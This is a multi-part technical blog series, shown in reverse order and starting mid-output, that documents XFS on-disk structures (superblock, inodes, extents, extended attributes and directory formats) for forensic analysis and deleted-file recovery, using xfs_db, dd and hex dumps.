du[0].tag = 0x40
du[1].inumber = 64
du[1].namelen = 2
du[1].name = ".."
du[1].filetype = 2
du[1].tag = 0x50
du[2].inumber = 34100330
du[2].namelen = 5
du[2].name = "fstab"
du[2].filetype = 1
du[2].tag = 0x60
du[3].inumber = 67146851
du[3].namelen = 8
du[3].name = "crypttab"
[...]

I’m using the addr command in xfs_db to select the startblock value from the first extent in the array (the zero element of the array).

The beginning of this first data block is nearly identical to the block directories we looked at previously. The only difference is that single block directories have a magic number “XDB3”, while data blocks in multi-block directories use “XDD3” as we see here. Remember that the value that xfs_db lobels dhdr.hdr.bno is actually the sector offset to this block and not the block number.

Let’s look at the next data block:

xfs_db> inode 67146849
xfs_db> addr u3.bmx[1].startblock
xfs_db> print
dhdr.hdr.magic = 0x58444433 ("XDD3")
dhdr.hdr.crc = 0xa0dba9dc (correct)
dhdr.hdr.bno = 38905568
dhdr.hdr.lsn = 0x2200007442
dhdr.hdr.uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
dhdr.hdr.owner = 67146849
dhdr.bestfree[0].offset = 0xad8
dhdr.bestfree[0].length = 0x20
dhdr.bestfree[1].offset = 0xc18
dhdr.bestfree[1].length = 0x20
dhdr.bestfree[2].offset = 0xd78
dhdr.bestfree[2].length = 0x20
du[0].inumber = 67637117
du[0].namelen = 10
du[0].name = "machine-id"
du[0].filetype = 1
du[0].tag = 0x40
du[1].inumber = 67146855
du[1].namelen = 9
du[1].name = "localtime"
[...]

Again we see the same header information. Note that each data block has it’s own “free space” array, tracking available space in that data block.

Finally, we have the block containing the hash lookup table and tail record. We could use xfs_db to decode this block, but it turns out that there are some interesting internal structures to see here. Here’s the hex editor view of the start of the block:

Extent Directory Tail Block:

0-3     Forward link                        0
4-7     Backward link                       0
8-9     Magic number                        0x3df1
10-11   Padding                             zeroed
12-15   CRC32                               0xef654461

16-23   Sector offset                       38883440
24-31   Log seq number last update          0x2200008720
32-47   UUID                                e56c3b41-...-dd609cb7da71
48-55   Inode number                        67146849

56-57   Number of entries                   0x0126 = 294
58-59   Unused entries                      1
60-63   Padding for alignment               zeroed

The “forward” and “backward” links would come into play if this were a multi-node B+Tree data structure rather than a single block. Unlike previous magic number values, the magic value here (0x3df1) does not correspond to printable ASCII characters.

After the typical XFS header information, there is a two-byte value tracking the number of entries in the directory, and therefore the number of entries in the hash lookup table that follows. The next two bytes tell us that there is one unused entry– typically a record for a deleted file.

We find this unused record near the end of the hash lookup array. The entry starting at block offset 0x840 has an offset value of zero, indicating the entry is unused:

Extent Directory Tail block 0x820

Interestingly, right after the end of the hash lookup array, we see what appears to be the extended attribute information from an inode. This is apparently residual data left over from an earlier use of the block.

At the end of the block is data which tracks free space in the directory:

Extent Directory Tail Block 0xFFF

The last four bytes in the block are the number of blocks containing directory entries– two in this case. Preceding those four bytes is a “best free” array that tracks the length of the largest chunk of free space in each block. You will notice that the array values here correspond to the dhdr.bestfree[0].length values for each block in the xfs_db output above. When new directory entries are added, this array helps the file system locate the best spot to place the new entry.

We see the two bytes immediately before the “best free” array are identical to the first entry in the array. Did the /etc directory once consume three blocks and later shrink back to two? Based on limited testing, this appears to be the case. Unlike directories in traditional Unix file systems, which never shrink once blocks have been allocated, XFS directories will grow and shrink dynamically as needed.

So far we’ve looked at the three most common directory types in XFS: small “short form” directories stored in the inode, single block directories, and in this case a multi-block directories tracked with an extent array in the inode. In rare cases, when the directory is very large and very fragmented, the extent array in the inode is insufficient. In these cases, XFS uses a B+Tree to track the extent information. We will examine this scenario in the next installment.

 

XFS (Part 4) – Block Directories

In the previous installment, we looked at small directories stored in “short form” in the inode. While these small directories can make up as much as 90% of the total directories in a typical Linux file system, eventually directories get big enough that they can no longer be packed into the inode data fork. When this happens, directory data moves out to blocks on disk.

In the inode, the data fork type (byte 5) changes to indicate that the data is no longer stored within the inode. Extents are used to track the location of the disk blocks containing the directory data. Here is the inode core and extent list for a directory that only occupies a single block:

Inode detail for directory occupying a single block

The data fork type is 2, indicating an extent list follows the inode core. Bytes 76-79 indicate that there is only a single extent. The extent starts at byte 176 (0x0B0), immediately after the inode core. The last 21 bits of the extent structure show that the extent only contains a single block. Parsing the rest of the extent yields a block address of  0x8118e7, or relative block 71911 in AG 2.

We can extract this block and examine it in our hex editor. Here is the data in the beginning of the block:

Block Directory Header and Entries

The directory block begins with a 48 byte header:

0-3      Magic number                       XDB3
4-7      CRC32 checksum                     0xaf6a416d
8-15     Sector offset of this block        39409464

16-23    Last LSN update                    0x20000061fe
24-39    UUID                               e56c3b41-...-dd609cb7da71
40-47    inode that points to this block    0x0408e66d

You may compare the UUID and inode values in the directory block header with the corresponding values in the inode to see that they match.

The XFS documentation describes the sector offset field as the “block number”. However, using the formula from Part 1 of this series, we can calculate the physical block number of this block as:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         71911   =   4926183

Multiply the block offset 4926183 by 8 sectors per block to get the sector offset value 39409464 that we see in the directory block header.

Following the header is a “free space” array that consumes 12 bytes, plus 4 bytes of padding to preserve 64-bit alignment. The free space array contains three elements which indicate where the three largest chunks of unused space are located in this directory block. Each element is a 2 byte offset and a 2 byte length field. The elements of the array are sorted in descending order by the length of each chunk.

In this directory block, there is only a single chunk of free space, starting at offset 1296 (0x0510) and having 2376 bytes (0x0948) of space. The other elements of the free space array are zeroed, indicating no other free space is available.

The directory entries start at byte 64 (0x040) and can be read sequentially like a typical Unix directory. However, XFS uses a hash-based lookup table, growing up from the bottom of the directory block, for more efficient searching:

Block Directory Tail Record and Hash Array

The last 8 bytes of the directory block are a “tail record” containing two 4 byte values: the number of directory entries (0x34 or 52) and the number of unused entries (zero). Immediately preceding the tail record will be an array of 8 byte records, one record per directory entry (52 records in this case). Each record contains a hash value computed from the file name, and the offset in the directory block where the directory entry for that file is located. The array is sorted by hash value so that binary search can quickly find the desired record. The offsets are in 8 byte units.

The xfs_db program can compute hash values for us:

xfs_db> hash 03_smallfile
0x3f07fdec

If we locate this hash value in the array, we see the byte offset value is 0x12 or 18. Since the offset units are 8 bytes, this translates to byte offset 144 (0x090) from the start of the directory block.

Here are the first six directory entries from this block, including the entry for “03_smallfile”:

Directory Entry Detail

Directory entries are variable length, but always 8 byte (64-bit) aligned. The fields in each directory entry are:

     Len (bytes)       Field
     ===========       =====
          8            Inode number
          1            File name length
          varies       File name
          1            File type
          varies       Padding for alignment
          2            Byte offset of this directory entry

64-bit inode addresses are always used. This is different from “short form” directories, where 32-bit inode addresses will be used if possible.

File name length is a single byte, limiting file names to 255 characters. The file type byte uses the same numbering scheme we saw in “short form” directories:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Padding for alignment is only included if necessary. Our “03_smallfile” entry starting at offset 0x090 is exactly 24 bytes long and needs no padding for alignment. You can clearly see the padding in the “.” and “..” entries starting at offset 0x040 and 0x050 respectively.

Deleting a File

If we remove “03_smallfile” from this directory, the inode updates similarly to what we saw with the “short form” directory in the last installment of this series. The mtime and ctime values are updated, and the CRC32 and Logfile Sequence Number fields as well. The file size does not change, since the directory still occupies one block.

The “tail record” and hash array at the end of the directory block change:

Tail record and hash array post delete

The tail record still shows 34 entries, but one of them is now unused. If we look at the entry for hash 0x3F07FDEC, we see the offset value has been zeroed, indicating an unused record.

We also see changes at the beginning of the block:

Directory entry detail post delete

The free space array now uses the second element, showing 24 (0x18) bytes free at byte offset 0x90– the location where the “03_smallfile” entry used to reside.

Looking at offset 0x90, we see that the first two bytes of the inode field are overwritten with 0xFFFF, indicating an unused entry. The next two bytes are the length of the free space. Again we see 0x18, or 24 bytes.

However, since inode addresses in this file system fit in 32 bits, the original inode address associated with this file is still clearly visible. The rest of the original directory entry is untouched until a new entry overwrites this space. This should make file recovery easier.

Not Quite Done With Directories

When directories get large enough to occupy multiple blocks, the directory structure gets more complicated. We’ll examine larger directories in our next installment.

XFS (Part 3) – Short Form Directories

XFS uses several different directory structures depending on the size of the directory. For testing purposes, I created three directories– one with 5 files, one with 50, and one with 5000 file entries. Small directories have their data stored in the inode. In this installment we’ll examine the inode of the directory that contains only five files.

XFS Inode with

We documented the “inode core” layout and the format of the extended attributes in Part 2 of this series. In this inode the file type (upper nibble of byte 2) is 4, which means it’s a directory. The data fork type (byte 5) is 1, meaning resident data.

Resident directory data is stored as a “short form” directory structure starting at byte offset 176, right after the inode core. First we have a brief header:

176      Number of directory entries                   5
177      Number of dir entries needing 64-bit inodes   0
178-181  Inode of parent                               0x04159fa1

First we have a byte tracking the number of directory entries to follow the header. The next byte tracks how many directory entries require 64 bits for inode data. As we saw in Part 1 of this series, XFS uses variable length addreses for blocks and inodes. In our file system, we need less than 32 bits to store these addresses, so there are no directory entries requiring 64-bit inodes. This means the directory data will use 32 bits to store inodes in order to save space.

This has an immediate impact because the next entry in the header is the inode of the parent directory. Since byte 177 is zero, this field will be 32 bits. If byte 177 was non-zero, then all inode entries in the header and directory entries would be 64-bit.

The parent inode field in the header is the equivalent of the usual “..” link in the directory. The current directory inode (the “.” link) is found in the inode core in bytes 152-159. The short form directory simply uses these values and does not have explicit “.” and “..” entries.

After the header come a series of variable length directory entries, packed as tightly as possible with no alignment constraints. Entries are added to the directory in order of file creation and are not sorted in any way.

Here is a description of the fields and a breakdown of the values in the five directories in this inode:

      Len (Bytes)      Field
          1            Length of file name (in bytes)
          2            Entry offset in non short form directory
          varies       Characters in file name
          1            File type
          4 or 8       Absolute inode address

Len    Offset     Name            Type      Inode
===    ======     ====            ====      =====
12     0x0060     01_smallfile    01        0x0417979d
10     0x0078     02_bigfile      01        0x0417979e
12     0x0090     03_smallfile    01        0x0417979f
10     0x00a8     04_bigfile      01        0x0417a154
12     0x00c0     05_smallfile    01        0x0417a155

First we have a single byte for the file name length in bytes. Like other Unix file systems, there is a 255 character file name limit.

The next two bytes are based on the byte offset the directory entry would have if it were a normal XFS directory entry and not packed into a short form directory in the inode. In a normal directory block, directory entries are 64-bit aligned and start at byte offset 96 (0x60) following the directory header and “.” and “..” entries. The directory entries here are all 18 or 20 bytes long, which means they would consume 24 bytes (0x18) in a normal directory block. Using a consistent numbering scheme for the offset makes it easier to write code that iterates through directory entries, even though the offsets don’t match the actual offset of each directory entry in the short form style.

Next we have the characters in the file name followed by a single byte for the file type. The file type is included in the directory entry so that commands like “ls -F” don’t have to open each inode to get the file type information. The file type values in the directory entry do not use the same number scheme as the file type in the inode. Here are the expected values for directory entries:

    1   Regular file
    2   Directory
    3   Character special device
    4   Block special device
    5   FIFO
    6   Socket
    7   Symlink

Finally there is a field to hold the inode associated with the file name. In our example, these inode entries are 32 bits. 64-bit inode fields will be used if the directory header indicates they are needed.

Deleting a File

When a file is deleted from (or added to) a directory, the mtime and ctime in the directory’s inode core are updated. The directory file size changes (bytes 56-63). The CRC32 checksum and the logfile sequence number fields are updated.

In the data fork, all directory entries after the deleted entry are shifted downwards, completely overwriting the deleted entry. Here’s what the directory entries look like after “03_smallfile”– the third entry in the original directory– is deleted:

Short form directory entry after file deleted

The four remaining directory entries are highlighted above. However, after those entries you can clearly see the residue of the entry for “05_smallfile” from the original directory. So as short-form directories shrink, they leave behind entries in the unused “inode slack”. In this case the residue is for a file entry that still exists in the directory, but it’s possible that we might get residue of entries deleted from the end of the directory list.

When Directories Grow Up

Another place you can see short form directory residue is when the directory gets large enough that it needs to move out to blocks on disk. I created a sample directory that initially had five files and confirmed that it was being stored as a short form directory in the inode. Then I added 45 more files to the directory, which made a short form directory impossible. Here’s what the first part of the inode looks like after these two operations:

Extent directory with short form residue

The data fork type (byte 5) is 2, meaning an extent list after the inode core, giving the location of the directory content on disk. You can see the extent highlighted starting at byte offset 176 (0xb0). But immediately after that extent you can see the residue of the original short-form directory.

The format of directories changes significantly when directory entries move out into disk blocks. In our next installment we will examine the structures in these larger directories.

XFS (Part 2) – Inodes

Part 1 of this series was a quick introduction to XFS, the XFS superblock, and the unique Allocation Group (AG) based addressing scheme used in the file system. With this information, we were able to extract an inode from its physical location on disk

In this installment, we will look at the structure of the XFS inode. Since we will want to see what remains in the inode after a file is deleted, I’m going to create a small file for testing purposes:

[root@localhost ~]# echo This is a small file >testfile
[root@localhost ~]# ls -i testfile
100799719 testfile

To save time, we’ll use the xfs_db program to convert that inode address into the values we need to extract the inode from its physical location on disk. Then we’ll use dd to extract the inode as we did in Part 1.

[root@localhost ~]# xfs_db -r /dev/mapper/centos-root
xfs_db> convert inode 100799719 agno 
0x3 (3)
xfs_db> convert inode 100799719 agblock
0x429c (17052)
xfs_db> convert inode 100799719 offset
0x7 (7)
xfs_db> ^D
[root@localhost ~]# dd if=/dev/mapper/centos-root bs=4096 \
                         skip=$((3*2427136 + 17052)) count=1 | 
                    dd bs=512 skip=7 count=1 >/home/hal/testfile-inode

Looking at the Inode

We can now view the inode in our trusty hex editor:

XFS Inode with Extent Array

XFS v5 inodes start with a 176 byte “inode core” structure:

0-1      Magic number                              "IN"
2-3      File type and mode bits (see below)       1000 000 110 100 100
4        Version (v5 file system uses v3 inodes)   3
5        Data fork type flag (see below)           2
6-7      v1 inode numlinks field (not used in v3)  zeroed
8-11     File owner UID                            0 (root)
12-15    File GID                                  0 (root)

16-19    v2+ number of links                       1
20-21    Project ID (low)                          0
22-23    Project ID (high)                         0
24-29    Padding (must be zero)                    0
30-31    Increment on flush                        0

32-35    atime epoch seconds                       0x5afdd6cd
36-39    atime nanoseconds                         0x2467330e
40-43    mtime epoch seconds                       0x5afdd6cd
44-47    mtime nanoseconds                         0x24767568

48-51    ctime epoch seconds                       0x5afd d6cd
52-55    ctime nanoseconds                         0x2476 7568
56-63    File (data fork) size                     0x15 = 21

64-71    Number of blocks in data fork             1
72-75    Extent size hint                          zeroed
76-79    Number of data extents used               1

80-81    Number of extended attribute extents      0
82       Inode offset to xattr (8 byte multiples)  0x23 = 35 * 8 = 280
83       Extended attribute type flag (see below)  1
84-87    DMAPI event mask                          0
88-89    DMAPI state                               0
90-91    Flags                                     0 (none set)
92-95    Generation number                         0xa3fd42cd

96-99    Next unlinked ptr (if inode unlinked)    -1 (NULL in XFS)

/* v3 inodes (v5 file system) have the following fields */
100-103  CRC32 checksum for inode                  0xb43f0d10
104-111  Number of changes to attributes           1

112-119  Log sequence number of last update        0x2100006185
120-127  Extended flags                            0 (none set)

128-131  Copy on write extent size hint            0
132-143  Padding for future use                    0

144-147  btime epoch seconds                       0x5afdd6cd
148-151  btime nanoseconds                         0x2467330e
152-159  inode number of this inode                0x60214e7 = 100799719

160-175  UUID                                      e56c3b41-...-dd609cb7da71

XFS inodes start with the 2 byte magic number value “IN”. Inodes also have a CRC32 checksum (bytes 100-103) to help detect corruption. The inode includes its own absolute inode number (bytes 152-159) and the file system UUID (bytes 160-175), which should match the UUID value from the superblock. Whenever the inode is updated, bytes 112-119 track the “logfile sequence number” (LSN) of the journal entry for the update. The inode format has changed across different versions of the XFS file system, so refer to the inode version in byte 4 before decoding the inode. XFS v5 uses v3 inodes.

The size of the file (in bytes) is a 64-bit value in bytes 56-63. The original XFS inode tracked the number of links as a 16-bit value (bytes 6-7), which is no longer used. Number of links is now tracked as a 32-bit value found in bytes 16-19.

Timestamps include both a 32-bit “Unix epoch” style seconds field and a 32-bit nanosecond resolution fractional seconds field. The three classic Unix timestamps– atime, mtime, ctime– are found in bytes 32-55 of the inode. File creation time (btime) was only added in XFS v5, so that timestamp resides in bytes 144-151 in the upper portion of the inode core.

File ownership and permissions are tracked as in earlier Unix file systems. There are 32-bit file owner (bytes 8-11) and group owner (bytes 12-15) fields. File type and permissions are stored in a packed 16-bit structure. The low 12 bits are the standard Unix permissions bits, and the upper four bits are used for the file type.

The file type nibble will be one of the following values:

   8   Regular file
   4   Directory
   2   Character special device
   6   Block special device
   1   FIFO
   C   Socket
   A   Symlink

The 12 permissions bits are grouped into four groups of 3 bits, and are often written in octal notation– in our case we have 0644. The first group of three represents the “special” bit flags: set-UID, set-GID, and “sticky” (none of these are set for our test file). The remaining three groups represent “read” (r), “write” (w), and “execute” (x) permissions for three categories. The first set of bits applies to the file owner, the second to members of the Unix group that owns the file, and the last group for everybody else. The permissions on our test file are 644 or 110 100 100 aka rw-r–r–. In other words, read and write access for the file owner, and read only access for group members and for all other users on the system.

The remaining space after the 176 bytes of inode core is used to track the data blocks associated with the file (the “data fork” of the file) and any extended attributes that may be set. There are multiple ways in which data and attributes may be stored– locally resident within the inode, in a series of extents, or in a more complex B+Tree indexed structure. The data fork type flag in byte 5 and the extended attribute type flag in byte 83 document how this information is organized. The possible values for these fields are:

   0   Special device file (data type only)
   1   Data is resident ("local") in the inode
   2   Array of extent structures follows
   3   B+Tree root follows

Currently XFS only uses resident or “local” storage for extended attributes and small directories. There is a proposal to allow small files to be stored in the inode (similar to NTFS), but this is still under development. The data fork for our small test file is type 2– an array of extent structures. The extended attributes are type 1, meaning they are stored locally in the inode.

The data fork starts at byte 176, immediately after the inode core. The start of the extended attribute data is found at an offset from the end of the inode core. This offset is byte 82 of the inode core, and the units are multiples of 8 bytes. In our sample inode, the offset value is 0x23 or 35. Multiplying by 8 gives a byte offset of 280 from the end of the inode core, or 176+280=456 bytes from the beginning of the inode.

Extent Arrays

The most common storage option for file content in XFS is data fork type 2– an array of 16 byte extent structures starting immediately after the inode core. Bytes 76-79 indicate how many extent structures are in the array. Our file is not fragmented, so there is only a single extent structure in the inode.

Theoretically, the 336 bytes following the inode core could hold 21 extent structures, assuming no extended attribute data. If the inode cannot hold all of the extent information (an extremely fragmented file), then the data fork in the inode becomes the root of a B+Tree (data fork type 3) for tracking extent information. We will see an example of this in a later installment in this series.

The challenging thing about XFS extent structures is that they are not byte aligned. They contain four fields as follows:

  • Flag (1 bit) – Set if extent is preallocated but not yet written, zero otherwise
  • Logical offset (54 bits) – Logical offset from the start of the file
  • Starting block (52 bits) – Absolute block address of the start of the extent
  • Length (21 bits) – Number of blocks in the extent

If you think this makes manually decoding XFS extent information challenging, you’d be correct. Let’s break the extent structure down into individual bits in order to make decoding a bit easier. The extent starts at byte offset 176 (0xb0), and I’ll use a little command-line magic to see the bits:

[root@localhost ~]# xxd -b -c 4 /home/hal/testfile-inode | 
                       grep -A3 0b0:
00000b0: 00000000 00000000 00000000 00000000  ....
00000b4: 00000000 00000000 00000000 00000000  ....
00000b8: 00000000 00000000 00011000 00001000  ....
00000bc: 00001111 00100000 00000000 00000001  . ..

Flag bit (1 bit): 0
logical offset (54 bits): 0
absolute start block (52 bits): 
    0 00000000 00000000 00000000 00011000 00001000 00001111 001

    0000 0000 0000 0000 0000 0000 0000 1100 0000 0100 0000 0111 1001
      0    0    0    0    0    0    0    C    0    4    0    7    9

    block 0xC04079 aka relative block 0x4079 (16505) in AG 3

block count (21 bits): 1

Let’s check and see if we decoded the structure correctly:

[root@localhost ~]# dd if=/dev/mapper/centos-root bs=4096 
                       skip=$((3*2427136 + 16505)) count=1 | xxd
0000000: 5468 6973 2069 7320 6120 736d 616c 6c20  This is a small 
0000010: 6669 6c65 0a00 0000 0000 0000 0000 0000  file............
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
[... all zeroes to end ...]

Looks like we got it right. Note that XFS null fills file slack space, which is typical for Unix file systems.

Extended Attributes

XFS allows arbitrary extended attributes to be added to the file. Attributes are simply name, value pairs. There is a 255 byte limit on the size of any attribute name or value. You can set or view attributes from the command line with the “attr” command.

If the amount of attribute data is small, extended attributes will be stored in the inode, just as they are in our sample file. Large amounts of attribute information may need to be stored in data blocks on disk, in which case the attribute data is tracked using extents just like the data fork.

As we discussed above, resident attribute information starts at a specific byte offset from the end of the inode core. In our sample file the offset is 280 bytes from the end of the inode core or 456 bytes (280 + 176) from the start of the inode.

Attributes start with a four byte header:

456-457  Length of attributes               0x34 = 52
458      Number of attributes to follow     1
459      Padding for alignment              0

The length field unit is bytes and includes the 4 byte header. Our sample file only contains a single attribute.

Each attribute structure is variable length, to allow attributes to be packed as tightly as possible. Each attribute structure starts with a single byte for the name length, then a byte for the value length, and a flag byte. The rest of the attribute structure is the name followed by the value, with no null terminators or padding for byte alignment.

Breaking down the single attribute we have in our sample inode, we see:

460      Length of name                     7
461      Length of value                    0x26 = 38
462      Flags                              4 
463-469  Attribute name                     selinux
470-507  Attribute value                    unconfined_u:...

This attribute holds the SELinux context on our file, “unconfined_u:object_r:admin_home_t:s0”. While extended attribute values are not required to be null-terminated, SELinux expects it’s context labels to have null terminators. So the 38 byte value length is 37 printable characters and a null.

The flags field is designed to control access to the attribute information. The flags byte is defined as a bit mask, but only four values appear to be used currently:

   128   Attribute is being updated
     4   "Secure" - attribute may be viewed by all but only set by root
     2   "Trusted" - attribute may only be viewed and set by root
     0   No restrictions

The Inode After Deletion

When a file is deleted, changes are limited to a small number of fields in the inode core:

  • The 2 byte file type and permissions field is zeroed
  • Link count, file size, number of blocks, and number of extents are zeroed
  • ctime is set to the time the file was deleted
  • The offset to the extended attributes is zeroed
  • The data fork and extended attribute type bytes are set to 2, which would normally mean an extent array
  • The “Generation number” field (inode bytes 92-95) is incremented–more testing is required, but it appears this field may be a usage count for the inode
  • The CRC32 checksum and the LSN are updated

No other data in the inode changes. So while the number of extents value is zeroed and so is the offset to the start of the extended attributes, the actual extent and attribute data remains in the inode.

This means it should be straightforward to recover the original file by parsing whatever  extent data exists starting at inode offset 176. The XFS FAQ points to two Open Source projects that appear to use this idea to recover deleted files, and a little Google searching turns up several commercial tools that claim to do XFS file recovery:

I have not had the opportunity to test any of these tools.

In limited testing it also appears that the data fork and the extended attribute information are not zeroed when the inode is reused. This means there is the possibility of finding remnants of data from a previous file in the unused or “slack” space in the inode.

Using xfs_db to View Inodes

xfs_db allows you to quickly view the inode values, even for inodes that are currently unallocated:

[root@localhost ~]# xfs_db -r /dev/mapper/centos-root
xfs_db> inode 100799719
xfs_db> print
core.magic = 0x494e
core.mode = 0
core.version = 3
core.format = 2 (extents)
core.nlinkv2 = 0
core.onlink = 0
core.projid_lo = 0
core.projid_hi = 0
core.uid = 0
core.gid = 0
core.flushiter = 0
core.atime.sec = Thu May 17 16:41:15 2018
core.atime.nsec = 821506703
core.mtime.sec = Thu May 17 16:41:15 2018
core.mtime.nsec = 821506703
core.ctime.sec = Thu May 17 22:10:07 2018
core.ctime.nsec = 163429238
[... additional output not shown...]

xfs_db even converts the timestamps for you, so that’s a win.

What’s Next?

XFS does not store file name information in the inode, which is pretty typical for Unix file systems. The only place where file names exist is in directory entries. In our next installment we will begin to examine the different XFS directory types. Yes, it’s complicated.

XFS (Part 1) – The Superblock

The XFS file system was originally developed by Silicon Graphics for their IRIX operating system. The Linux version is increasingly popular– Red Hat has adopted XFS as their default file system as of Red Hat Enterprise Linux v7. Unfortunately, while XFS is becoming more common on Linux systems, we are lacking forensic tools for decoding this file system. This series will provide insights into the XFS file system structures for forensics professionals, and document the current state of the art as far as tools for decoding XFS.

I would like to thank the XFS development community for their work on the file system and their help in preparing these articles. Links to the documentation, source code, and the mailing list are available from XFS.org. I wouldn’t have been able to do any of this work without these resources.

A Quick Overview of XFS

XFS is a modern journaled file system which uses extent-based file allocation and B+Tree style directories. XFS supports arbitrary extended file attributes. Inodes are dynamically allocated. The block size is 4K by default, but can be set to other values at file system creation time. All file system metadata is stored in “big endian” format, regardless of processor architecture.

Some of the structures in XFS are recognizable from older Unix file systems. XFS still uses 32-bit signed Unix epoch style timestamps, and has the “Year 2038” rollover problem as a result. XFS v5– the version currently used in Linux– does have a creation date (btime) field in addition to the normal last modified (mtime), access time (atime), and metadata change time (ctime) timestamps. XFS timestamps also have an additional 32-bit nanosecond resolution element. File type and permissions are stored in a packed 16-bit value, just like in older Unix file systems.

Very little data gets overwritten when files are deleted in XFS. Directory entries are simply marked as unused, and the extent data in the inode is still visible after deletion. File recovery should be straightforward.

In addition, standard metadata structures in XFS v5 contain a consistent unique file system UUID value, along with information like the inode value associated with the data structure. Metadata structures also have unique “magic number” values. These features facilitate file system and data recovery, and are very useful when carving or viewing raw file system data. Metadata structures include a CRC32 checksum to help detect corruption.

One interesting feature of XFS is that a single file system is subdivided into multiple Allocation Groups— four by default on RHEL systems. Each allocation group (AG) can be treated as a separate file system with its own inode and block lists. The intention was to allow multiple threads to write in parallel to the same file system with minimal interaction. This makes XFS a quite high performing file system on multi-core systems.

It also leads to a unique addressing scheme for blocks and inodes that uses a combination of the AG number and a relative block or inode offset within that AG. These values are packed together into a single address, normally stored as a 64-bit value. However the actual length of the relative portion of the address and the AG value can vary from file system to file system, as we will discuss below. In other words, it’s complicated.

The Superblock

As with other Unix file systems, XFS starts with a superblock which helps decode the file system. The superblock occupies the first 512 bytes of each XFS AG. The primary superblock is the one in AG 0 at the front of the file system, with the superblocks in the other AGs used for redundancy.

Only the first 272 bytes of the superblock are currently used. Here is a breakdown of the information from the superblock:

XFS AG0 Superblock

0-3      Magic Number                       "XFSB"
4-7      Block Size (in bytes)              0x1000 = 4096
8-15     Total blocks in file system        0x942400 = 9,708,544

16-23    Num blocks in real-time device     zeroed
24-31    Num extents in real-time device    zeroed

32-47    UUID                               e56c3b41-...-dd609cb7da71

48-55    First block of journal             0x800004 = 8388612
56-63    Root directory's inode             0x40 = 64

64-71    Real-time extents bitmap inode     0x41 = 65
72-79    Real-time bitmap summary inode     0x42 = 66

80-83    Real-time extent size (in blocks)  0x01
84-87    AG size (in blocks)                0x250900 = 2,427,136 (c.f. 8-15)
88-91    Number of AGs                      0x04
92-95    Num of real-time bitmap blocks     zeroed

96-99    Num of journal blocks              0x1284 = 4740
100-101  File system version and flags      0xB4B5 (low nibble is version)
102-103  Sector size                        0x200 = 512
104-105  Inode size                         0x200 = 512
106-107  Inodes/block                       0x08
108-119  File system name                   not set-- zeroed
120      log2(block size)                   0x0C (2^^12 = 4096)
121      log2(sector size)                  0x09 (2^^9 = 512)
122      log2(inode size)                   0x09
123      log2(inode/block)                  0x03 (2^^3 = 8 inode/block)
124      log2(AG size) rounded up           0x16 (2^^22 = 4M > 2,437,136)
125      log2(real-time extents)            zeroed
126      File system being created flag     zeroed
127      Max inode percentage               0x19 = 25%

128-135  Number of allocated inodes         0x2C500 = 181504
136-143  Number of free inodes              0x385 = 901

144-151  Number of free blocks              0x8450dc = 8,671,452
152-159  Number of free real-time extents   zeroed

160-167  User quota inode                   -1 (NULL in XFS)
168-175  Group quota inode                  -1 (NULL in XFS)

176-177  Quota flags                        zero
178      Misc flags                         zero
179      Reserved                           Must be zero
180-183  Inode alignment (in blocks)        0x04
184-187  RAID unit (in blocks)              zeroed
188-191  RAID stripe (in blocks)            zeroed

192      log2(dir blk allocation granularity)         zero
193      log2(sector size of externl journal device)  zero  
194-195  Sector size of external journal device       zero
196-199  Stripe/unit size of external journal device  0x01
200-203  Additional flags                             0x018A
204-207  Repeat additional flags (for alignment)      0x018A

/* Version 5 only */
208-211  Read-write feature flags (not used)          zero
212-215  Read-only feature flags                      zero
216-219  Read-write incompatibility flags             0x01
220-223  Read-write incompat flags for log (unused)   zero

224-227  CRC32 checksum for superblock                0x0A5832D0
228-231  Sparse inode alignment                       zero
232-239  Project quota inode                          -1

240-247  Log seq number of last superblock update     0x19000036EA
248-263  UUID used if INCOMPAT_META_UUID feature      zeroed
264-271  If INCOMPAT_META_RMAPBT, inode of RM btree   zeroed

Rather than discussing all of these fields in detail, I am going to focus in on the fields we need to quickly get into the file system.

First we need basic file system structure size information like the block size (bytes 4-7) and inode size (bytes 104-105). XFS v5 defaults to 4K blocks and 512 byte inodes, which is what we see here.

As we’ll discuss below, the number of AGs (bytes 88-91) and the size of each AG in blocks (bytes 84-87) are critical for locating data’s physical location on the storage device. This file system has 4 AGs which each contain 2,427,136 blocks (roughly 9.6GB per AG or just under 40GB for the file system).

The superblock contains the inode number of the root directory (bytes 56-63)– this value is normally 64. We also find the starting block of the file system journal (bytes 48-55) and the journal length in blocks (bytes 96-99). We’ll cover the journal in a later article in this series.

While looking at file system metadata in a hex editor is always fun, XFS does include a program named xfs_db which allows for more convenient decoding of various file system structures. Here’s an example of using xfs_db to decode the superblock of our example file system:

[root@localhost XFS]# xfs_db -r /dev/mapper/centos-root
xfs_db> sb 0
xfs_db> print
magicnum = 0x58465342
blocksize = 4096
dblocks = 9708544
rblocks = 0
rextents = 0
uuid = e56c3b41-ca03-4b41-b15c-dd609cb7da71
[...]

“xfs_db -r” allows read-only access to mounted file systems. The “sb 0” command selects the superblock from AG 0. “print” has a built-in template to automatically parse and display the superblock information.

Inode and Block Addressing

Typically XFS metadata uses “absolute” addresses, which contain both AG information and a relative offset from the start of that AG. This is what we find here in the superblock and in directory files. Sometimes XFS will use “AG relative” addresses that only include the relative offset from the start of the AG.

While XFS typically allocates 64-bits to hold absolute addresses, the actual size of the address fields varies depending on the size of the file system. For block addresses, the number of bits for the “AG relative” portion of the inode is the log2(AG size) value found in superblock byte 124. In the example superblock, this value is 22. So the lower 22 bits of the block address will be the relative block offset. The upper bits will be used to hold the AG number.

The first block of the file system journal is at address 0x800004. Let’s write that out in binary showing the AG and relative block offset portions:

     0x800004   =    1000 0000 0000 0000 0000 0100
AG# in upper 2 bits---/\---22 bits of relative block offset

So the journal starts at relative block offset 4 from the beginning of AG 2.

But where is that in terms of a physical block offset? The physical block offset can be calculated as follows:

(AG number) * (blocks per AG) + (relative block offset)
     2      *    2427136      +         4   =    4854276

We could perform this calculation on the Linux command line and use dd to extract the first block of the journal:

[root@localhost XFS]# dd if=/dev/mapper/centos-root bs=4096 \
       skip=$((2*2427136 + 4)) count=1 | xxd
0000000: 0000 0021 0000 0000 6901 0000 071a 4dba  ...!....i.....M.
0000010: 0000 0010 6900 0000 4e41 5254 2800 0000  ....i...NART(...
[...]

